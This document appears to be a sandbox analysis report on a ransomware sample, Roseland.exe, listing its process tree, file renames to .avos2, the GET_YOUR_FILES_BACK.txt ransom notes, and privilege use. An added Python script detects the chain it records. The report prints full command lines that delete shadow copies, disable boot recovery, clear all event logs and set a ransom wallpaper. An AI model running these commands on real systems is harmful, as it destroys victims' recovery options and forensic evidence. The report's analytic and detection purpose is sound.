PID 620 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 620 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1264 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 2964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2876 wrote to memory of 2964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2876 wrote to memory of 2964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2876 wrote to memory of 2976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 2876 wrote to memory of 2976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 2876 wrote to memory of 2976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1715839980.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False
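The process tree above is the part of this report that transfers directly into detection: the sample spawns cmd.exe wrappers for WMIC and vssadmin shadow-copy deletion, two bcdedit changes that disable Windows recovery, a PowerShell one-liner that clears every event log, and a second PowerShell that renders the note to a PNG and sets it as wallpaper through reg.exe. The following is an added example, not code from the report or the sandbox vendor, that replays that tree as constructed process-creation events and flags the chain per process tree. The event field names (pid, ppid, image, cmdline), the rule names and the verdict thresholds are assumptions modelled loosely on Sysmon Event ID 1 / Security 4688 data; the PIDs and command lines are copied from the Processes list above, with one benign `vssadmin list shadows` event added as a negative control.

```python
"""
Added example (not part of the sandbox report): replay the recorded process tree
as constructed process-creation events and flag the recovery-inhibition and
anti-forensics chain. Field names and thresholds are assumptions, loosely
modelled on Sysmon EID 1 / Security 4688.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# (rule name, ATT&CK technique, image-name regex, command-line regex), all case-insensitive.
# Rules match the tool that does the work, not the cmd.exe wrapper that launched it.
RULES = [
    ("shadow copy deletion (vssadmin)", "T1490", r"vssadmin\.exe$", r"delete\s+shadows\b.*(/all|/quiet)"),
    ("shadow copy deletion (wmic)", "T1490", r"wmic\.exe$", r"shadowcopy\s+delete"),
    ("recovery disabled (bcdedit)", "T1490", r"bcdedit\.exe$", r"/set\s+\{default\}\s+recoveryenabled\s+no"),
    ("boot status policy (bcdedit)", "T1490", r"bcdedit\.exe$", r"/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures"),
    ("event log clearing (PowerShell)", "T1070.001", r"powershell\.exe$", r"clear-eventlog"),
    ("wallpaper set via reg.exe", "T1491.001", r"reg\.exe$", r"control panel\\desktop.*\s/v\s+wallpaper\b"),
]

# Constructed from the Processes section above (PIDs from the WriteProcessMemory rows).
SAMPLE_EVENTS = [
    ProcEvent(1820, 1000, r"C:\Users\Admin\AppData\Local\Temp\Roseland.exe", r'"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"'),
    ProcEvent(1632, 1820, r"C:\Windows\system32\cmd.exe", "cmd /c wmic shadowcopy delete /nointeractive"),
    ProcEvent(1180, 1632, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic shadowcopy delete /nointeractive"),
    ProcEvent(1736, 1820, r"C:\Windows\system32\cmd.exe", "cmd /c vssadmin.exe Delete Shadows /All /Quiet"),
    ProcEvent(692, 1736, r"C:\Windows\system32\vssadmin.exe", "vssadmin.exe Delete Shadows /All /Quiet"),
    ProcEvent(1456, 1820, r"C:\Windows\system32\cmd.exe", "cmd /c bcdedit /set {default} recoveryenabled No"),
    ProcEvent(380, 1456, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} recoveryenabled No"),
    ProcEvent(620, 1820, r"C:\Windows\system32\cmd.exe", "cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ProcEvent(1068, 620, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ProcEvent(1264, 1820, r"C:\Windows\system32\cmd.exe", 'cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"'),
    ProcEvent(2388, 1264, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 'powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"'),
    # Wallpaper one-liner, abbreviated here; its embedded reg add is caught at the child reg.exe.
    ProcEvent(2876, 1820, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", 'powershell -Command "$a = [System.IO.File]::ReadAllText(\\"C:\\GET_YOUR_FILES_BACK.txt\\");Add-Type -AssemblyName System.Drawing"'),
    ProcEvent(2964, 2876, r"C:\Windows\system32\reg.exe", r'"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1715839980.png /f'),
    # Negative control (constructed): an admin listing shadows must not fire.
    ProcEvent(4000, 3999, r"C:\Windows\system32\vssadmin.exe", "vssadmin list shadows"),
]


def match_rules(ev):
    """All (rule name, technique) pairs whose image and command-line patterns both match."""
    return [(name, tech) for name, tech, img_re, cmd_re in RULES
            if re.search(img_re, ev.image, re.I) and re.search(cmd_re, ev.cmdline, re.I)]


def root_ancestor(ev, by_pid):
    """Follow ppid links to the top-most process we hold an event for (cycle-safe)."""
    cur, seen = ev, set()
    while cur.ppid in by_pid and cur.pid not in seen:
        seen.add(cur.pid)
        cur = by_pid[cur.ppid]
    return cur


def analyze(events):
    """Group rule hits by the root image of each process tree: {root_image: {hits, techniques}}."""
    by_pid = {e.pid: e for e in events}
    report = {}
    for ev in events:
        hits = match_rules(ev)
        if not hits:
            continue
        root = root_ancestor(ev, by_pid)
        entry = report.setdefault(root.image, {"hits": [], "techniques": set()})
        for name, tech in hits:
            entry["hits"].append((ev.pid, name))
            entry["techniques"].add(tech)
    return report


def verdict(entry):
    """Shadow-copy deletion plus BCD tampering from one tree is the pre-encryption signature."""
    names = {name for _, name in entry["hits"]}
    has_vss = any("shadow copy" in n for n in names)
    has_bcd = any("bcdedit" in n for n in names)
    if has_vss and has_bcd:
        return "high"
    if has_vss or has_bcd or "T1070.001" in entry["techniques"]:
        return "medium"
    return "low"


if __name__ == "__main__":
    for root, entry in analyze(SAMPLE_EVENTS).items():
        print(root, verdict(entry), sorted(entry["techniques"]))
        for pid, name in entry["hits"]:
            print("  ", pid, name)
```

Grouping by the root of the tree rather than alerting per process is the point: each command here is also run legitimately by backup agents and administrators, but no legitimate workflow deletes all shadow copies, disables recovery and clears every event log from the same parent within a minute.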

Network

N/A

Files

memory/1632-54-0x0000000000000000-mapping.dmp

memory/1736-55-0x0000000000000000-mapping.dmp

memory/620-56-0x0000000000000000-mapping.dmp

memory/1456-57-0x0000000000000000-mapping.dmp

memory/692-60-0x0000000000000000-mapping.dmp

memory/1264-58-0x0000000000000000-mapping.dmp

memory/1180-59-0x0000000000000000-mapping.dmp

memory/380-61-0x0000000000000000-mapping.dmp

memory/1068-62-0x0000000000000000-mapping.dmp

memory/2388-63-0x0000000000000000-mapping.dmp

memory/2388-64-0x000007FEFB851000-0x000007FEFB853000-memory.dmp

memory/2388-67-0x0000000002434000-0x0000000002437000-memory.dmp

memory/2388-66-0x000007FEF2D50000-0x000007FEF38AD000-memory.dmp

memory/2388-68-0x000000001B740000-0x000000001BA3F000-memory.dmp

memory/2388-69-0x000000000243B000-0x000000000245A000-memory.dmp

memory/2388-70-0x0000000002434000-0x0000000002437000-memory.dmp

memory/2388-71-0x000000000243B000-0x000000000245A000-memory.dmp

memory/2876-72-0x0000000000000000-mapping.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 982338975335c602272a8753d769d083
SHA1 4d2c9acaf021fb270d980f89f690cd3ca6c7bd50
SHA256 8d149e376e6538ecb9d1eb7f8d8673aa305dce25de7ee01956ab6cffd573e664
SHA512 b323c8ba1330ab3d872e1467e5040788492132e173c1dd6d003a4498ed7386a98af81f68b6508b5a60442465b979c2b18fad596810543d457f275052e1cb2d55

memory/2876-77-0x000007FEF3C30000-0x000007FEF478D000-memory.dmp

memory/2876-78-0x000000001B8B0000-0x000000001BBAF000-memory.dmp

C:\GET_YOUR_FILES_BACK.txt

MD5 6d81ed40ba0a283e5483bfe6a448e9d7
SHA1 0c847a5f9df743b13e1aa11b4c24a4309e9a7119
SHA256 b4464f61655ca584170694bedd52c6cff2b74c18a761b33cfb1387f017d2d57d
SHA512 8956415f155f24852ac672aa06cc6a8819a2a0e44a9b940f8f3390c34ebb43ff10f4635722f104a5a9a94098d3f286362f507dc49d3f048e540f48c073eaf379

memory/2876-80-0x0000000002464000-0x0000000002467000-memory.dmp

memory/2876-81-0x000000000246B000-0x000000000248A000-memory.dmp

memory/2964-82-0x0000000000000000-mapping.dmp

memory/2976-83-0x0000000000000000-mapping.dmp

memory/2876-84-0x0000000002464000-0x0000000002467000-memory.dmp

memory/2876-85-0x000000000246B000-0x000000000248A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-13 09:23

Reported

2023-01-13 09:25

Platform

win10v2004-20221111-en

Max time kernel

145s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\AddConvertFrom.tif => C:\Users\Admin\Pictures\AddConvertFrom.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\OpenLimit.tiff => C:\Users\Admin\Pictures\OpenLimit.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\ResetJoin.png => C:\Users\Admin\Pictures\ResetJoin.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\TestSave.raw => C:\Users\Admin\Pictures\TestSave.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\CopyClose.tif => C:\Users\Admin\Pictures\CopyClose.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\DenyOut.png => C:\Users\Admin\Pictures\DenyOut.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\DisableAdd.png => C:\Users\Admin\Pictures\DisableAdd.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Users\Admin\Pictures\OpenLimit.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\RequestUnregister.crw => C:\Users\Admin\Pictures\RequestUnregister.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\SendDebug.tif => C:\Users\Admin\Pictures\SendDebug.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\302165477.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msolui.rll C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\offsymsb.ttf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sq.pak.DATA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\es-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\it-it\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarAppList.targetsize-256_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-32_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-threaddump.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_GB\README_en_GB.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\sk-sk\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\js\nls\nb-no\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxA-Google.scale-300.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_ja.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\en_US.aff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_sv_135x40.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Office\root\Office16\sdxs\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioStdR_OEM_Perp-ppd.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-templates.xml_hidden C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Retail-ul-phn.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardR_Retail-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\pmd.cer C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\he-il\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\es-es\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\delete.svg C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\Cultures\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProMSDNR_Retail-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Common Files\microsoft shared\ink\ru-RU\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\de-DE\TabTip.exe.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectStdO365R_Subscription-pl.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Google\Update\1.3.36.71\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\css\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\cs-cz\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\OutlookMailWideTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription3-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Java\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugin.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\MyriadCAD.otf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\Words.pdf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\ExchangeBadge.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\blocklist.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000049\index.win32.stats.json C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\example_icons2x.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\[email protected] C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\TrackedSend.aapp C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailBadge.scale-100.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailLargeTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\en-gb\locimages\offsymk.ttf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Publisher2019R_OEM_Perp-ul-oob.xrm-ms C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\lo.pak.DATA C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\LanguageNames2\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
